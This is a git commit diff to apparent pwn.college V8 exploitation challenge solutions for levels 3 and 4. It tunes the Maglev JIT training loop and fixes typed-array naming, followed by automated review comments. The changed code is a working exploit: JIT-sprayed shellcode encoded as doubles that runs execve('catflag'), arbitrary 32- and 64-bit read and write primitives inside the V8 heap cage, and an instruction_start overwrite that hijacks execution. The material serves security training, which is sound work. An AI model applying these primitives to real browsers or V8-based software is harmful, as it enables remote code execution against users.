Minor Changes to Level 3 & 4 of PwnCollegeV8Exploitation

1. The threshold to trigger MAGLEV compilation differs depending on whether gdb is attached to d8.
    - When gdb is attached to d8, the training loop count needed to trigger MAGLEV is 100,000.
    - But when d8 runs standalone, the training loop count needed to trigger MAGLEV is only 10,000. If you still use 100,000, TURBOFAN is triggered instead; the code data structure then changes and shellcode execution fails.
2. Fixed other miscellaneous minor mistakes.
This commit is contained in:
Jack Ren
2024-09-15 08:57:29 +08:00
parent cf1552b522
commit 90245c7091
2 changed files with 10 additions and 12 deletions


@@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)` // JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
} }
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
// Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array // Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
// map, properties, elements, length --- first three field are static roots // map, properties, elements, length --- first three field are static roots
@@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000); arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let written = b2f(value); let written = b2f(value);
fakearr[0] = written; fakearr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
// ArbRead64(0xfffffff0); // ArbRead64(0xfffffff0);
@@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
function ArbRead32(cage_addr) { // int32 -> int32 function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = si32a[(cage_addr & 0x4) >> 2]; let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result; return result;
} }
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
si32a[(cage_addr & 0x4) >> 2] = value; i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
@@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16)); console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B); ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode(); shellcode();
// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10
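Review bot: The tier-up iteration count on the `for (let i = 0; i < 10000; i++) shellcode();` line is a bare literal whose correct value depends on the run environment, as the commit message explains, but nothing at the call site records that, and the same literal is duplicated in the second file. Hoisting it into a named constant with a comment would keep the two files in step and document why the value is what it is: `const MAGLEV_TRAINING_ITERATIONS = 10000; // invocation budget for Maglev tier-up; differs when d8 runs under gdb (see commit message)` followed by `for (let i = 0; i < MAGLEV_TRAINING_ITERATIONS; i++) shellcode();`. The `shellcode` function and the surrounding top-level script begin before this hunk.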


@@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)` // JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
} }
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
let placeholder = {}; let placeholder = {};
let corrupt_arr = [2.30234590962020889586281057477E-320]; let corrupt_arr = [2.30234590962020889586281057477E-320];
@@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002); corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
let written = b2f(value); let written = b2f(value);
double_arr[0] = written; double_arr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
// DWORD Aligned // DWORD Aligned
function ArbRead32(cage_addr) { // int32 -> int32 function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = si32a[(cage_addr & 0x4) >> 2]; let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result; return result;
} }
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
si32a[(cage_addr & 0x4) >> 2] = value; i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
@@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16)); console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B); ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode(); shellcode();
// the possibility of getting flag by running exploit once is 1/10
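Review bot: `ArbRead32` and `ArbWrite32` only work if `bi64a` and `i32a` are views over the same backing buffer — writing `bi64a[0]` and then indexing `i32a[(cage_addr & 0x4) >> 2]` selects half of that qword solely through shared storage — yet neither function's header comment states this, and since the declarations are outside the hunk I am inferring the aliasing. A comment on the `function ArbRead32(cage_addr)` line such as `// assumes bi64a and i32a are views over one ArrayBuffer: the index picks the low or high dword of bi64a[0] — confirm against the declarations` would make the contract explicit, and the same comment belongs on the identical pair of functions in the first file. If `i32a` is a signed view, the `// int32 -> int32` annotation and `result.toString(16)` will print a leading sign for values with bit 31 set, which is worth noting in the same comment.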